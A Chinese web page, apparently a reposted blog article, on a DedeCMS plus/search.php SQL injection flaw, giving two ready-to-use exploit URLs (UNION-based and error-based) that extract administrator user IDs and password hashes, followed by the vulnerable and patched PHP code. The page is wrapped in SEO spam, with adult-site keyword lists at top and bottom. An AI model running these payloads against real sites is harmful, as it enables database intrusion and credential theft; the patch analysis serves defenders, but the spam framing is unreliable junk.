久久久久久久av_日韩在线中文_看一级毛片视频_日本精品二区_成人深夜福利视频_武道仙尊动漫在线观看

dedecms plus/search.php注入漏洞修復(fù)及利用

dedecms的最近出的一高危漏洞,search.php注入漏洞;估計(jì)現(xiàn)在很多黑闊都非常愛dedecms,因?yàn)榻?jīng)常有各種漏洞爆出.很多利用起來也都很簡單. 下面是漏洞的詳細(xì)利用細(xì)節(jié): 0×1: http://www.example

dedecms的最近出的一高危漏洞,search.php注入漏洞;估計(jì)現(xiàn)在很多黑闊都非常愛dedecms,因?yàn)榻?jīng)常有各種漏洞爆出.很多利用起來也都很簡單.

下面是漏洞的詳細(xì)利用細(xì)節(jié):

0×1:

http://www.example.com/plus/search.php?keyword=as&typeArr[ uNion ]=a

報(bào)錯(cuò)如果為:Safe Alert: Request Error step 2 !

則利用以下exp:http://www.example.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,
pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`\'`+]=a

0×2:

http://www.example.com/plus/search.php?keyword=as&typeArr[ uNion ]=a

報(bào)錯(cuò)如果為:Safe Alert: Request Error step 1 !

則利用以下exp:http://www.example.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a
+from+information_schema.tables+group+by+a)b)%23@`\'`+]=a

漏洞修復(fù):


20130115常規(guī)安全更新
include/arc.searchview.class.php, 搜索功能準(zhǔn)確度優(yōu)化
member/myfriend_group.php, 修復(fù)會員中心會員分組功能存在的安全隱患
plus/search.php, 修復(fù)搜索功能存在的安全隱患

登錄DEDECMS后臺會有提示,更新即可。不過貌似官方?jīng)]有提供安全更新補(bǔ)丁的下載地址,找了半天沒找到~

漏洞分析:

存在漏洞的文件/plus/search.php

//引入欄目緩存并看關(guān)鍵字是否有相關(guān)欄目內(nèi)容

require_once($typenameCacheFile);

if(isset($typeArr) && is_array($typeArr))

{

foreach($typeArr as $id=>$typename)

{

$keywordn = str_replace($typename, ‘ ‘, $keyword);

if($keyword != $keywordn)

{

$keyword = $keywordn;

$typeid = $id; //對ID沒做任何過濾 導(dǎo)致注入

break;

}

}

}

}

$keyword = addslashes(cn_substr($keyword,30));

修復(fù)之后

//引入欄目緩存并看關(guān)鍵字是否有相關(guān)欄目內(nèi)容

require_once($typenameCacheFile);

if(isset($typeArr) && is_array($typeArr))

{

foreach($typeArr as $id=>$typename)

{

//$keywordn = str_replace($typename, ‘ ‘, $keyword);

$keywordn = $keyword;

if($keyword != $keywordn)

{

$keyword = HtmlReplace($keywordn);//防XSS

$typeid = intval($id); //強(qiáng)制轉(zhuǎn)換為數(shù)字型

break;

}

}

}

}

$keyword = addslashes(cn_substr($keyword,30));


【網(wǎng)站聲明】本站除付費(fèi)源碼經(jīng)過測試外,其他素材未做測試,不保證完整性,網(wǎng)站上部分源碼僅限學(xué)習(xí)交流,請勿用于商業(yè)用途。如損害你的權(quán)益請聯(lián)系客服QQ:2655101040 給予處理,謝謝支持。

相關(guān)文檔推薦

我們有時(shí)候需要對織夢文檔的點(diǎn)擊量進(jìn)行批量維護(hù),比如采集來的文章,點(diǎn)擊量都為0,需要批量修改,可以用到如下方法1。 1、在數(shù)據(jù)庫里運(yùn)行下面的代碼就可以了,文章的點(diǎn)擊量變得
用過dedecms的朋友都知道,織夢cms后臺系統(tǒng)基本參數(shù)里是無法直接上傳圖片的,我們更換logo圖只能到ftp里替換,非常的不方便,我們?nèi)绻胫苯釉谙到y(tǒng)基本參數(shù)里上傳,要怎么處理呢?
dedecms要想調(diào)用所有子欄目是沒有這個(gè)標(biāo)簽的,要調(diào)用只可用sql標(biāo)簽,reid表示子欄目,channeltype=6表示模型為商品,sortrank表示按排序升序.小的放前面 {dede:sql sql=Select * from `dede_arctype` where r
這篇文章主要為大家介紹了Dedecms待審核章在列表頁顯示的方法,實(shí)例分析了兩種常見的技巧,非常具有實(shí)用價(jià)值,需要的朋友可以參考下
更新文檔發(fā)現(xiàn),模板文件不存在,無法解析文檔,是模板位置不對造成的, 第一個(gè)地方,就是模認(rèn)模板這里,正確的。 還有第二步,就是要把高級選項(xiàng)這里,改成和你正在使用的模板
按原理你要想更改數(shù)據(jù)庫密碼,先要到你買的空間的更改數(shù)據(jù)庫密碼,然后在到DEDECMS data/common.inc.php 把數(shù)據(jù)庫密碼改成何你空間的數(shù)據(jù)庫密碼一樣,這樣網(wǎng)站才能正常顯示。但是問題來
主站蜘蛛池模板: 日本黄色免费网站 | 欧美日韩精品久久久免费观看 | 五月婷婷开心 | 四虎影视最新地址 | 亚洲黄色天堂 | 亚洲一区中文 | 日本不卡免费 | 亚洲网站在线 | 欧美成人免费 | 国产精品视频久久久 | 欧美8888| 欧美激情国产精品 | av网站观看| 欧美精品在线视频 | 毛片毛片毛片 | 中文字幕在线视频播放 | 亚洲一区欧美 | 午夜小视频在线观看 | 成人a级片 | 精品视频一区二区三区 | 成人动漫视频 | 国产免费黄色 | 天天爱天天操 | 狠狠干2018 | 久久视频这里只有精品 | 欧美精品福利 | 亚洲黄色成人 | 日韩有码在线观看 | 老司机午夜免费精品视频 | 亚洲激情偷拍 | 两性免费视频 | 国产又粗又猛又黄又爽的视频 | 成人羞羞国产免费游戏 | 亚洲理论片 | 看片黄全部免费 | 欧美激情视频网站 | 日韩在线成人 | 日韩欧美一区二区在线观看 | 色妞网站 | 91久久综合 | 久久一级视频 |